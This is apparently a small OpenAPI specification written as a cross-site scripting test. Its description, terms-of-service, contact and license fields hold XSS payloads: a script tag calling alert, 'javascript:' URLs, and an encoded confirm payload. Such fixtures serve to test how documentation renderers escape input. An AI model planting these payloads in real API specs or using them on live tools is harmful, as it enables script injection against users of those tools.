openapi: 3.3.1
info:
  title: "xss test"
  description: "'>+<script>alert(1)</script>"
  termsOfService: "JavaScript://%250Dtop.confirm?.(1)//"
  contact:
    name: "xss test"
    email: "xss test"
    url: "javascript:alert(document.domain)"
  license:
    name: "xss test"
    url: "JavaScript://%250Dtop.confirm?.(1)//"
  version: "1.0"
paths: {}
